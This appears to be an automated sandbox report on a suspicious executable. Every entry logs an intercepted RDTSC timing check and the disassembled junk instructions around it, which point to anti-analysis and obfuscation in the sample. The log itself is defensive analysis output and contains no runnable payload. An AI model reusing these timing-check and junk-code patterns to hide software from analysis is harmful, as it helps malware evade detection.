Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: CA4AB0 second address: CA4AB5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: CA6226 second address: CA6237 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jbe 00007FC9D8BCC166h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d pushad 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: CA6237 second address: CA6243 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pushad 0x00000006 push eax 0x00000007 pop eax 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: CB1621 second address: CB1626 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: CB1626 second address: CB1646 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC9D915F4C7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push edi 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: CB1646 second address: CB164B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: CB164B second address: CB1652 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: CB191D second address: CB1934 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop edx 0x00000009 jg 00007FC9D8BCC178h 0x0000000f push eax 0x00000010 push edx 0x00000011 jng 00007FC9D8BCC166h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: CB2058 second address: CB206E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC9D915F4BEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push esi 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: CB2B5C second address: CB2B6D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC9D8BCC16Bh 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: CB75D5 second address: CB75D9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: CB75D9 second address: CB75E9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a jns 00007FC9D8BCC166h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: CB75E9 second address: CB75F3 instructions: 0x00000000 rdtsc 0x00000002 ja 00007FC9D915F4B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: CB7227 second address: CB722D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: CB7363 second address: CB7369 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: CB7369 second address: CB736E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: CD500E second address: CD5012 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: CD5012 second address: CD5028 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FC9D8BCC16Ch 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: CD5028 second address: CD502C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: CD4D05 second address: CD4D09 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: CEDBFC second address: CEDC01 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: CEDC01 second address: CEDC06 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: CECA0F second address: CECA37 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC9D915F4C9h 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c jp 00007FC9D915F4B6h 0x00000012 push ebx 0x00000013 pop ebx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: CECA37 second address: CECA3D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: CECA3D second address: CECA48 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 pushad 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: CECA48 second address: CECA4E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: CECA4E second address: CECA57 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: CECA57 second address: CECA6A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC9D8BCC16Fh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: CECBF6 second address: CECBFA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: CECBFA second address: CECC1E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 jp 00007FC9D8BCC19Ah 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007FC9D8BCC16Fh 0x00000014 ja 00007FC9D8BCC166h 0x0000001a rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: CECC1E second address: CECC34 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC9D915F4BFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: CED081 second address: CED095 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FC9D8BCC166h 0x00000008 jno 00007FC9D8BCC166h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 push edx 0x00000013 pop edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: CED095 second address: CED099 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: CED64A second address: CED650 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: CED7C4 second address: CED7DD instructions: 0x00000000 rdtsc 0x00000002 js 00007FC9D915F4B6h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push edi 0x0000000d pushad 0x0000000e popad 0x0000000f pop edi 0x00000010 push ebx 0x00000011 pushad 0x00000012 popad 0x00000013 pop ebx 0x00000014 pushad 0x00000015 push eax 0x00000016 pop eax 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: CED917 second address: CED91D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: CED91D second address: CED921 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: CEF1B6 second address: CEF1C3 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FC9D8BCC166h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push ebx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: CEF1C3 second address: CEF1DA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007FC9D915F4B6h 0x0000000a pop ebx 0x0000000b popad 0x0000000c push esi 0x0000000d push eax 0x0000000e push edx 0x0000000f je 00007FC9D915F4B6h 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: CEF1DA second address: CEF1DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: CEF1DE second address: CEF1E2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: CF33C6 second address: CF3421 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC9D8BCC177h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c jl 00007FC9D8BCC176h 0x00000012 jmp 00007FC9D8BCC170h 0x00000017 jbe 00007FC9D8BCC16Ch 0x0000001d mov dword ptr [ebp+124674A7h], eax 0x00000023 push 00000004h 0x00000025 mov edx, dword ptr [ebp+122D1E2Fh] 0x0000002b push A4105B35h 0x00000030 push eax 0x00000031 push edx 0x00000032 jp 00007FC9D8BCC16Ch 0x00000038 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: CF3421 second address: CF3426 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: CF36F3 second address: CF36F9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: CF36F9 second address: CF36FD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: CF48A7 second address: CF48BE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push esi 0x00000004 pop esi 0x00000005 pushad 0x00000006 popad 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007FC9D8BCC16Bh 0x0000000f push ebx 0x00000010 pop ebx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: CF5F79 second address: CF5F7D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: CF5F7D second address: CF5FA8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FC9D8BCC173h 0x0000000d jmp 00007FC9D8BCC170h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: CF5FA8 second address: CF5FCA instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007FC9D915F4C8h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: CF5FCA second address: CF5FCE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: CF5FCE second address: CF5FD4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: CF5FD4 second address: CF6019 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jne 00007FC9D8BCC166h 0x0000000d pushad 0x0000000e popad 0x0000000f pushad 0x00000010 popad 0x00000011 popad 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 jns 00007FC9D8BCC166h 0x0000001c jno 00007FC9D8BCC166h 0x00000022 jmp 00007FC9D8BCC16Ah 0x00000027 popad 0x00000028 jmp 00007FC9D8BCC178h 0x0000002d rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: CF6019 second address: CF601E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: 4D70121 second address: 4D70131 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC9D8BCC16Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: 4D70131 second address: 4D70150 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push esi 0x00000009 pushad 0x0000000a mov bx, si 0x0000000d mov ax, B285h 0x00000011 popad 0x00000012 mov dword ptr [esp], ebp 0x00000015 push eax 0x00000016 push edx 0x00000017 pushad 0x00000018 mov edx, 3A587000h 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: 4D70150 second address: 4D70155 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: 4D70155 second address: 4D70188 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC9D915F4C4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FC9D915F4C7h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: 4D70188 second address: 4D701DE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FC9D8BCC16Fh 0x00000009 xor ecx, 5761613Eh 0x0000000f jmp 00007FC9D8BCC179h 0x00000014 popfd 0x00000015 call 00007FC9D8BCC170h 0x0000001a pop eax 0x0000001b popad 0x0000001c pop edx 0x0000001d pop eax 0x0000001e pop ebp 0x0000001f push eax 0x00000020 push edx 0x00000021 jmp 00007FC9D8BCC16Ch 0x00000026 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: 4D60011 second address: 4D600C4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC9D915F4C1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b mov dh, cl 0x0000000d pushfd 0x0000000e jmp 00007FC9D915F4C9h 0x00000013 add esi, 70EAF2D6h 0x00000019 jmp 00007FC9D915F4C1h 0x0000001e popfd 0x0000001f popad 0x00000020 push eax 0x00000021 pushad 0x00000022 mov bx, 2C12h 0x00000026 pushfd 0x00000027 jmp 00007FC9D915F4C3h 0x0000002c and eax, 2865F40Eh 0x00000032 jmp 00007FC9D915F4C9h 0x00000037 popfd 0x00000038 popad 0x00000039 xchg eax, ebp 0x0000003a jmp 00007FC9D915F4BEh 0x0000003f mov ebp, esp 0x00000041 pushad 0x00000042 mov bh, al 0x00000044 mov di, 321Eh 0x00000048 popad 0x00000049 pop ebp 0x0000004a push eax 0x0000004b push edx 0x0000004c jmp 00007FC9D915F4C0h 0x00000051 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: 4DA00CD second address: 4DA00D3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: 4DA00D3 second address: 4DA00D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: 4DA00D7 second address: 4DA0132 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ebx 0x00000009 jmp 00007FC9D8BCC16Ch 0x0000000e mov dword ptr [esp], ebp 0x00000011 pushad 0x00000012 mov cx, AD8Dh 0x00000016 mov ah, 95h 0x00000018 popad 0x00000019 mov ebp, esp 0x0000001b pushad 0x0000001c pushfd 0x0000001d jmp 00007FC9D8BCC16Bh 0x00000022 adc cx, 823Eh 0x00000027 jmp 00007FC9D8BCC179h 0x0000002c popfd 0x0000002d mov ax, 2987h 0x00000031 popad 0x00000032 pop ebp 0x00000033 pushad 0x00000034 mov edi, eax 0x00000036 push eax 0x00000037 push edx 0x00000038 push eax 0x00000039 push edx 0x0000003a rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: 4DA0132 second address: 4DA0136 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: 4D30184 second address: 4D3018E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ebx, 546D5BB2h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: 4D3018E second address: 4D30222 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push esp 0x00000008 jmp 00007FC9D915F4C4h 0x0000000d mov dword ptr [esp], ebp 0x00000010 jmp 00007FC9D915F4C0h 0x00000015 mov ebp, esp 0x00000017 pushad 0x00000018 mov ax, dx 0x0000001b popad 0x0000001c push dword ptr [ebp+04h] 0x0000001f pushad 0x00000020 jmp 00007FC9D915F4C5h 0x00000025 pushfd 0x00000026 jmp 00007FC9D915F4C0h 0x0000002b sub si, 9988h 0x00000030 jmp 00007FC9D915F4BBh 0x00000035 popfd 0x00000036 popad 0x00000037 push dword ptr [ebp+0Ch] 0x0000003a jmp 00007FC9D915F4C6h 0x0000003f push dword ptr [ebp+08h] 0x00000042 push eax 0x00000043 push edx 0x00000044 push eax 0x00000045 push edx 0x00000046 push eax 0x00000047 push edx 0x00000048 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: 4D30222 second address: 4D30226 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: 4D30226 second address: 4D3022C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: 4D50D3E second address: 4D50D42 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: 4D50D42 second address: 4D50D48 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: 4D50D48 second address: 4D50DB0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC9D8BCC179h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007FC9D8BCC16Eh 0x0000000f mov ebp, esp 0x00000011 jmp 00007FC9D8BCC170h 0x00000016 pop ebp 0x00000017 push eax 0x00000018 push edx 0x00000019 pushad 0x0000001a pushfd 0x0000001b jmp 00007FC9D8BCC16Dh 0x00000020 or ah, 00000026h 0x00000023 jmp 00007FC9D8BCC171h 0x00000028 popfd 0x00000029 mov ah, EBh 0x0000002b popad 0x0000002c rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: 4D50DB0 second address: 4D50DB6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: 4D507D4 second address: 4D507F1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC9D8BCC179h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: 4D507F1 second address: 4D50842 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC9D915F4C1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b pushfd 0x0000000c jmp 00007FC9D915F4BCh 0x00000011 adc cl, 00000048h 0x00000014 jmp 00007FC9D915F4BBh 0x00000019 popfd 0x0000001a movzx ecx, di 0x0000001d popad 0x0000001e push eax 0x0000001f jmp 00007FC9D915F4C2h 0x00000024 xchg eax, ebp 0x00000025 push eax 0x00000026 push edx 0x00000027 push eax 0x00000028 push edx 0x00000029 push eax 0x0000002a push edx 0x0000002b rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: 4D50842 second address: 4D50846 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: 4D50846 second address: 4D50863 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC9D915F4C9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: 4D50863 second address: 4D5089A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov dx, 7B52h 0x00000007 movsx edi, si 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov ebp, esp 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 pushfd 0x00000013 jmp 00007FC9D8BCC16Eh 0x00000018 jmp 00007FC9D8BCC175h 0x0000001d popfd 0x0000001e rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: 4D503C6 second address: 4D503D8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC9D915F4BEh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: 4D603BC second address: 4D603E9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC9D8BCC16Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007FC9D8BCC176h 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: 4D603E9 second address: 4D603ED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: 4D603ED second address: 4D60409 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC9D8BCC178h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: 4D60409 second address: 4D6042D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC9D915F4BBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FC9D915F4C0h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: 4D6042D second address: 4D6043C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC9D8BCC16Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: 4D6043C second address: 4D60442 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: 4D60442 second address: 4D60446 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: 4D60446 second address: 4D60459 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f movzx ecx, bx 0x00000012 popad 0x00000013 rdtsc
